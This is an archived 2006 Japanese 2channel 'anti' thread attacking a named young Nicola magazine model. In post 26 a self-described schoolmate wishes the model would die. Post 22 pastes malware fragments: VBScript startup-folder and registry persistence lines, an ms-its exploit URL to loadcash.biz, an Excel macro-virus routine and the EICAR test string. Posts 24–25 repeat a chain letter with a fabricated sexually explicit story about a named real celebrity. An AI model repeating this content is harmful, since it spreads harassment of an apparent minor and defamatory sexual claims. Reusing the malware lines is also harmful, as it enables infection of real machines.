5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

[アンチ]ニコモ・高屋敷彩乃[ファン禁止]

1 :無名モデル:2006/07/18(火) 15:37:52 ID:n8dNVHV3
いきなりニコ盛り、ハワイロケ。
どう考えても岡本玲&伊藤沙耶同様、ひいきの対象。

2 :無名モデル:2006/07/18(火) 15:40:17 ID:z8kHRWgw
レイちゃんカワユ

3 :無名モデル:2006/07/18(火) 15:54:53 ID:n8dNVHV3
岡本玲、伊藤沙耶はひいきの対象。


4 :無名モデル:2006/07/18(火) 16:16:05 ID:2V/vcIHX
ニコモで今高1の大阪住みの子しらない?

5 :無名モデル:2006/07/18(火) 16:43:30 ID:n8dNVHV3
>>4三原勇希ちゃんです。

6 :無名モデル:2006/07/19(水) 10:53:19 ID:Nfj/S0V3
高屋敷彩乃って笑顔がワンパターン。
何新人のクセに勇希ちゃんにとってかわってハワイロケ行ってるんだよ!!

7 :無名モデル:2006/07/23(日) 14:28:54 ID:???
 ・モデル個人スレは一つのみ、重複禁止。いろんな意見の人が同居できる公正・中立なスレを立てましょう。
 ・本スレとの話し合いで住み分けが必要な場合のみアンチスレ1つを認めます。

高屋敷彩乃チャン
http://life7.2ch.net/test/read.cgi/model/1152367893/

本スレとの話し合いもないソースもない
重複なので誘導

8 :無名モデル:2006/07/25(火) 15:37:57 ID:LPxy+qDQ
>>7
こっちはアンチ、向こうはアンチスレでもファンスレでもない。
それにアンチスレなんてかなりあるし、同じモデルのスレだってある。
それにアンチとファンが同居したらトラブルの原因。

9 :無名モデル:2006/07/27(木) 08:44:22 ID:???
アホか

アンチだけでマターリ誹謗中傷なんて


甘ち考えなんだよ


2ちゃんで群れて馴れ合ってんじゃねぇよ


タコ


どす黒い戦いを見に来てる身にもなれ

10 :無名モデル:2006/07/27(木) 08:45:16 ID:???
さっさと喧嘩始めろや!









で、高屋敷彩乃って誰よ?



11 :無名モデル:2006/07/27(木) 17:27:00 ID:q/ZmFbKi
>>9他の激しいスレに逝け。つーか人間だし。タコがPCやるわけがない。
>>10別にケンカしようがしまいがこっちの勝手。

12 :無名モデル:2006/07/28(金) 17:58:32 ID:dH/qyBNy
ずいぶん自己中だね。

13 :無名モデル:2006/07/29(土) 08:41:16 ID:???
学校では違う名前だよ

14 :無名モデル:2006/08/06(日) 17:34:15 ID:???
>>1は中学生or高校生

15 :無名モデル:2006/08/20(日) 00:55:02 ID:???
こいつ気持ち悪い

16 :無名モデル:2006/09/09(土) 13:49:23 ID:???
>>8
ローカルールも守れない池沼は来なくていいよ

17 :無名モデル:2006/09/09(土) 18:48:03 ID:???
ま、確かに

18 :無名モデル:2006/09/29(金) 21:33:45 ID:YsHt3MKb
>>13
kwsk

19 :無名モデル:2006/09/30(土) 16:17:50 ID:q9QTU0be
ヒント:オスカープロモーション

20 :無名モデル:2006/10/19(木) 17:04:33 ID:???
a

21 :無名モデル:2006/10/22(日) 18:05:59 ID:8SXfgbYm
栗山千明とか蒼井優とか沢尻エリカとかのときのニコラしかしらない

22 :<body onload=window()>:2006/10/22(日) 19:23:44 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


23 :ゆぅん♪:2006/10/27(金) 18:36:26 ID:8pdsIiWV
:*:・・:*:・♪・:*:・・:*:・♪:*:・・:*:・♪・:*:・・:*:・♪:*:
これを見た人は、今日以内にコピペしてIヶ所に貼ってね!もし貼ったら、付き合ってる人はすっごくLOVE☆になれるし、片思いの子は付き合えるし、好きな子がいない人は、イケメンに出会っちゃうよ☆★
もし貼らなかったら、明日のうちに付き合っている人は別れる、片思いの子は嫌われる、好きな人がいない子は一生付き合えないという災難があります!!
信じなくてもいいんだよ!!↑になるだけだしね☆
実際になったM先輩は、彼氏に振られました。T先輩は、張ったので、山下君似の人を見つけて、付き合うにいたっています!!
:*:・・:*:・♪・:*:・・:*:・♪:*:・・:*:・♪・:*:・・:*:・♪:*:



24 :ゆぅん♪:2006/10/27(金) 19:39:18 ID:8pdsIiWV
大変大変!大ニュースだよ!
一週間くらい前に友達と渋谷に行ったんだけど、なんと亀梨くnを見かけましたぁ!私は大×100000000000ファンだったんで、写メめっちゃ大量に取ってました。
でね、亀梨くnが勢いよく走ってたんで、それに追いかけて私と友達も走ってたんです。そしたら、暗い路地の方入ってたんで、どこ行くんだろう・・・と思ってたんです。
そしたら亀梨くnは携帯をとりだして「着いたから早く来いよ!」と言い携帯を閉じました。
すると数秒後、違う方向から綺麗な女性が出てきました。誰でも憧れるような長くてサラサラな髪でした。背も高くて、きっとモデルさんじゃないかと思います。

そしたら、二人とも何もしゃべらずに周りをキョロキョロして、人がいないことを確認し、亀梨くnが女性のスカートに手を入れたんです!!
私はその瞬間から携帯でムービーを撮りました。
二人は一言も声を出さずにやっていました。
いつの間に亀梨くnはズボンとパンツを脱いでいて、私は亀梨くnのアソコを見てしまいました。
しかも女の人はほぼ全裸でした。二人のアソコはヌメヌメで、しかも女の人は全身ベトベトでした。
20分くらい経って、二人は洋服を着て、何も無かったかのように無言で分かれていきました。
すっごく驚きました。
 
 
そのムービーをみなさんにも特別に見せようと思います。けど、それなりの価値があると思うので、このレスをコピって7つの板に貼ってください。
すると不思議なことにココ↓
[                               ]
にアドレスが出てくるんです。
ですが一部のパソコンでは9つ貼らないと出てきません。
よくこんなレスがあって、私はいつも試すんですが、できません。
だけど、このレスは本当に成功するんですよ。
私の友達13人中12人ができました。

ただ一つ言いますが、このムービーはすごく過激です。亀梨くnのアソコもくっきり丸見えです。

そういうのを覚悟して見てください。

以上報告でした。


25 :名無し:2006/11/05(日) 08:39:06 ID:CLwgdHSn
大変大変!大ニュースだよ!
一週間くらい前に友達と渋谷に行ったんだけど、なんと亀梨くnを見かけましたぁ!私は大×100000000000ファンだったんで、写メめっちゃ大量に取ってました。
でね、亀梨くnが勢いよく走ってたんで、それに追いかけて私と友達も走ってたんです。そしたら、暗い路地の方入ってたんで、どこ行くんだろう・・・と思ってたんです。
そしたら亀梨くnは携帯をとりだして「着いたから早く来いよ!」と言い携帯を閉じました。
すると数秒後、違う方向から綺麗な女性が出てきました。誰でも憧れるような長くてサラサラな髪でした。背も高くて、きっとモデルさんじゃないかと思います。

そしたら、二人とも何もしゃべらずに周りをキョロキョロして、人がいないことを確認し、亀梨くnが女性のスカートに手を入れたんです!!
私はその瞬間から携帯でムービーを撮りました。
二人は一言も声を出さずにやっていました。
いつの間に亀梨くnはズボンとパンツを脱いでいて、私は亀梨くnのアソコを見てしまいました。
しかも女の人はほぼ全裸でした。二人のアソコはヌメヌメで、しかも女の人は全身ベトベトでした。
20分くらい経って、二人は洋服を着て、何も無かったかのように無言で分かれていきました。
すっごく驚きました。
 
 
そのムービーをみなさんにも特別に見せようと思います。けど、それなりの価値があると思うので、このレスをコピって7つの板に貼ってください。
すると不思議なことにココ↓
[                               ]
にアドレスが出てくるんです。
ですが一部のパソコンでは9つ貼らないと出てきません。
よくこんなレスがあって、私はいつも試すんですが、できません。
だけど、このレスは本当に成功するんですよ。
私の友達13人中12人ができました。

ただ一つ言いますが、このムービーはすごく過激です。亀梨くnのアソコもくっきり丸見えです。

そういうのを覚悟して見てください。

以上報告でした。


26 :匿名希望:2006/11/18(土) 21:15:03 ID:Cc/vkRd1
なんていうか,可愛くないよね。高屋敷彩乃って。
ゥチの学校にいるんだけど。アヤノ。
笑顔まぢキモい。
カッコつけてる。しかもアイツ帰宅部なんだよ。
よくモデルやってて帰宅部でバックデコりまくりでスカートあげすぎなのに
先輩に目ェつけらんないなって思う。
もうつけられてるかもしんないしね。
とにかくキモいんですけど。アイツ。
死んじゃえばいいのに。

27 :希羅:2006/11/21(火) 15:22:38 ID:GI6UNmA2
26>>は?ありえねえし。

28 :無名モデル:2006/12/02(土) 11:33:18 ID:Dj9tTWDn
栗山千明はピチレモンじゃ

29 :無名モデル:2006/12/02(土) 15:22:42 ID:/nLc+tLT
しかしニコラもヘタクソな売り方したもんだな

・いきなりの海外ロケ
・ファッションセンス無し(私服はかなりキツイ)
・無理矢理な設定で企画の主役(ギャルは無理)
・顔が変な表紙


30 :ゆ-き:2006/12/03(日) 01:47:03 ID:jGqFes4/
彩乃の事,キモィって言ウくらL1だカら
そウ言ってる貴方ゎ
相当可愛いンだろーね

31 :無名モデル:2006/12/03(日) 04:15:34 ID:???
↑おのれはすっこんどれチンカスが

32 :英子:2006/12/14(木) 17:31:14 ID:vsJIzUYu
30のゆーき、読みずらいので小文字とかぎゃる文字やめてくれるといいんだけど。
コピーとかは仕方ないけどw

33 :ゆかこ:2006/12/26(火) 12:27:44 ID:e6W5FuT9

ちょっとむかつく

11 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)